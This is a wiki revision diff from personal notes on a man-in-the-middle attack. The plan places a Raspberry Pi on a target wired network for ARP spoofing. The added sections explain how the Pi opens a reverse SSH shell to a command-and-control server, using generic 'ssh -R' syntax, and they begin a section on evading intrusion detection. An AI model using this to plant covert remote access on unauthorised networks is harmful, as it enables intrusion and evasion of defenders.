MITM: Difference between revisions
From charlesreid1
| Line 22: | Line 22: | ||
==Preparing the Pi== | ==Preparing the Pi== | ||
First, plug the Pi into the router | First, plug the Pi into the router. | ||
===Getting a Reverse Shell to the Pi=== | |||
How to control the Pi once it is placed on a target network? SSH is an obvious way. | |||
Incoming SSH connections can/will be blocked by firewalls or other security measures. | |||
Reverse SSH is a good alternative to gain an SSH shell. | |||
Reverse SSH: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs. | |||
===SSH Command=== | |||
The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server. | |||
Normally, when you SSH to a machine, you execute a command like: | |||
<pre> | |||
$ ssh user@remoteserver | |||
</pre> | |||
But if you use the <code>-R</code> flag, it enables a reverse connection to the listener. | |||
<pre> | |||
$ ssh -R [bind_address:]port:host:hostport username@remoteserver | |||
</pre> | |||
Let's ignore <code>bind_address</code> for now. | |||
The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for <code>port</code>. | |||
<code>host</code> indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from <code>port</code> to <code>hostport</code>. And our host is <code>localhost</code>. | |||
Finally, the <code>username@remoteserver</code> enables us to create an SSH connection to the remote server in the first place. | |||
===Circumventing IDS=== | |||
Intrusion detection systems can detect SSH traffic based on the traffic looking different, regardless of what port. | |||
=Wireless Network= | =Wireless Network= | ||
Revision as of 04:07, 4 August 2015
What It Is
A man-in-the-middle attack is a general concept from encryption. It consists of two parties, Alice and Bob, trying to have an encrypted conversation. However, it is foiled by an attacker, Eve, who gets in the middle. This means that Alice and Eve communicate with one encryption key, while Bob and Eve communicate with another key.
Wired Network
Trying Man in the Middle attack with ARP spoofing on a wired network. The configuration:
+----[Target laptop] | | +---[Raspberry Pi] | | | | [Router]
How It Will Work
This (wired) man in the middle attack will work by using the Pi to spoof the MAC address of the target.
Preparing the Pi
First, plug the Pi into the router.
Getting a Reverse Shell to the Pi
How to control the Pi once it is placed on a target network? SSH is an obvious way.
Incoming SSH connections can/will be blocked by firewalls or other security measures.
Reverse SSH is a good alternative to gain an SSH shell.
Reverse SSH: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs.
SSH Command
The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server.
Normally, when you SSH to a machine, you execute a command like:
$ ssh user@remoteserver
But if you use the -R flag, it enables a reverse connection to the listener.
$ ssh -R [bind_address:]port:host:hostport username@remoteserver
Let's ignore bind_address for now.
The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for port.
host indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from port to hostport. And our host is localhost.
Finally, the username@remoteserver enables us to create an SSH connection to the remote server in the first place.
Circumventing IDS
Intrusion detection systems can detect SSH traffic based on the traffic looking different, regardless of what port.